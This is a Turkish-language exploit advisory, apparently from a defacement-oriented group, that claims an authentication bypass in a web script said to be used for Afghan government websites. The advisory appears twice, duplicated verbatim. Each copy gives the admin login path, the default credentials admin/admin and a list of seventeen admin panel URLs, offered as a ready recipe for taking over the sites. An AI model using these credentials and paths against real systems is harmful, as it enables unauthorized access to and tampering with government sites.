################################################## ##################
# Exploit Başlık: Obaidullah Sulaimankhil Uygunsuz Kimlik Doğrulaması Güvenlik Açığı
# Yazar [Keşfedilen]: KingSkrupellos
# Takım: Siber Dijital Güvenlik Ordusu
# Tarih: 03.03.2019
# Satıcı Ana Sayfa / Sosyal Medya: facebook.com/obaidullah.sulaimankhil
# Test Edilen: Windows ve Linux
# Kategori: Web Uygulamaları
# Exploit Risk: Yüksek
# Güvenlik Açığı Tipi:
CWE-287 [Yanlış Kimlik Doğrulama]
CWE-592 [Kimlik Doğrulama Baypas Sorunları]
CWE-305 [Birincil Zayıflık ile Kimlik Doğrulama Baypas]
CWE-288 [Alternatif Bir Yol veya Kanal Kullanarak Kimlik Doğrulama Baypas]
CWE-302 [Varsayılan-Belirlenebilir Verilere Göre Kimlik Doğrulama Baypas]
# PacketStormSecurity: packetstormsecurity.com/files/authors/13968
# CXSecurity: cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab: exploit4arab.org/author/351/KingSkrupellos
################################################## ##################
# Yazılım ve Sahip Hakkında Bilgi:
************************************
Afganistan'da web geliştiricisi olan ve geliştirilen Obaidullah SulaimanKhil
Afganistan Hükümeti İnternet Siteleri için Obaidullah Yazılım adında bir senaryo.
################################################## ##################
# Etki:
**********
* Bir aktör belirli bir kimliğe sahip olduğunu iddia ettiğinde, yazılım kanıtlamaz ya da yetersiz
iddianın doğru olduğunu kanıtlar.
* Kimlik doğrulama algoritması sağlam, ancak uygulanan mekanizma atlanabilir
kimlik doğrulama hatası için birincil olan ayrı bir zayıflığın sonucu olarak.
* Bu ürün kimlik doğrulaması gerektiriyor, ancak ürünün alternatif bir yolu var veya
kimlik doğrulaması gerektirmeyen bir kanal.
* Kimlik doğrulama şeması veya uygulaması varsayılan varsayılan anahtar veri öğelerini kullanır
değişmez olmak, ancak saldırgan tarafından kontrol edilebilir veya değiştirilebilir.
################################################## ##################
# Kimlik Doğrulama Bypass Exploit:
*****************************
Yönetici Paneli Giriş Yolu:
***********************
/Pages/AdminLogin.aspx
Yönetici kullanıcı adı: admin
Yönetici şifresi: admin
Kullanılabilir Yönetici Kontrol Paneli Bağlantıları:
********************************
/Pages/frmWelcomeMessageAdmin.aspx
/Pages/HistoryOfDMTVETAdmin.aspx
/Pages/AboutDMTVETAdmin.aspx
/Pages/HEDMAdmin.aspx
/Pages/frmStaffAdmin.aspx
/Pages/frmCeoMessageAdmin.aspx
/Pages/frmSliderAdmin.aspx
/Pages/frmDMTVETStructureAdmin.aspx
/Pages/frmDMTVETReport.aspx
/Pages/frmArticlesAdmin.aspx
/Pages/frmVisionAdmin.aspx
/Pages/frmPresentationsAdmin.aspx
/Pages/frmInterviewsAdmin.aspx
/Pages/frmAlbumAdmin.aspx
/Pages/frmNewsAdmin.aspx
/Pages/frmOthersAdmin.aspx
/Pages/frmContactUsAdmin.aspx
################################################## ##################
# Cyberizm.Org Digital Security Team'den KingSkrupellos tarafından keşfedildi
################################################## ##################
Exploit : https://cxsecurity.com/issue/WLB-2019030013
# Exploit Başlık: Obaidullah Sulaimankhil Uygunsuz Kimlik Doğrulaması Güvenlik Açığı
# Yazar [Keşfedilen]: KingSkrupellos
# Takım: Siber Dijital Güvenlik Ordusu
# Tarih: 03.03.2019
# Satıcı Ana Sayfa / Sosyal Medya: facebook.com/obaidullah.sulaimankhil
# Test Edilen: Windows ve Linux
# Kategori: Web Uygulamaları
# Exploit Risk: Yüksek
# Güvenlik Açığı Tipi:
CWE-287 [Yanlış Kimlik Doğrulama]
CWE-592 [Kimlik Doğrulama Baypas Sorunları]
CWE-305 [Birincil Zayıflık ile Kimlik Doğrulama Baypas]
CWE-288 [Alternatif Bir Yol veya Kanal Kullanarak Kimlik Doğrulama Baypas]
CWE-302 [Varsayılan-Belirlenebilir Verilere Göre Kimlik Doğrulama Baypas]
# PacketStormSecurity: packetstormsecurity.com/files/authors/13968
# CXSecurity: cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab: exploit4arab.org/author/351/KingSkrupellos
################################################## ##################
# Yazılım ve Sahip Hakkında Bilgi:
************************************
Afganistan'da web geliştiricisi olan ve geliştirilen Obaidullah SulaimanKhil
Afganistan Hükümeti İnternet Siteleri için Obaidullah Yazılım adında bir senaryo.
################################################## ##################
# Etki:
**********
* Bir aktör belirli bir kimliğe sahip olduğunu iddia ettiğinde, yazılım kanıtlamaz ya da yetersiz
iddianın doğru olduğunu kanıtlar.
* Kimlik doğrulama algoritması sağlam, ancak uygulanan mekanizma atlanabilir
kimlik doğrulama hatası için birincil olan ayrı bir zayıflığın sonucu olarak.
* Bu ürün kimlik doğrulaması gerektiriyor, ancak ürünün alternatif bir yolu var veya
kimlik doğrulaması gerektirmeyen bir kanal.
* Kimlik doğrulama şeması veya uygulaması varsayılan varsayılan anahtar veri öğelerini kullanır
değişmez olmak, ancak saldırgan tarafından kontrol edilebilir veya değiştirilebilir.
################################################## ##################
# Kimlik Doğrulama Bypass Exploit:
*****************************
Yönetici Paneli Giriş Yolu:
***********************
/Pages/AdminLogin.aspx
Yönetici kullanıcı adı: admin
Yönetici şifresi: admin
Kullanılabilir Yönetici Kontrol Paneli Bağlantıları:
********************************
/Pages/frmWelcomeMessageAdmin.aspx
/Pages/HistoryOfDMTVETAdmin.aspx
/Pages/AboutDMTVETAdmin.aspx
/Pages/HEDMAdmin.aspx
/Pages/frmStaffAdmin.aspx
/Pages/frmCeoMessageAdmin.aspx
/Pages/frmSliderAdmin.aspx
/Pages/frmDMTVETStructureAdmin.aspx
/Pages/frmDMTVETReport.aspx
/Pages/frmArticlesAdmin.aspx
/Pages/frmVisionAdmin.aspx
/Pages/frmPresentationsAdmin.aspx
/Pages/frmInterviewsAdmin.aspx
/Pages/frmAlbumAdmin.aspx
/Pages/frmNewsAdmin.aspx
/Pages/frmOthersAdmin.aspx
/Pages/frmContactUsAdmin.aspx
################################################## ##################
# Cyberizm.Org Digital Security Team'den KingSkrupellos tarafından keşfedildi
################################################## ##################
Exploit : https://cxsecurity.com/issue/WLB-2019030013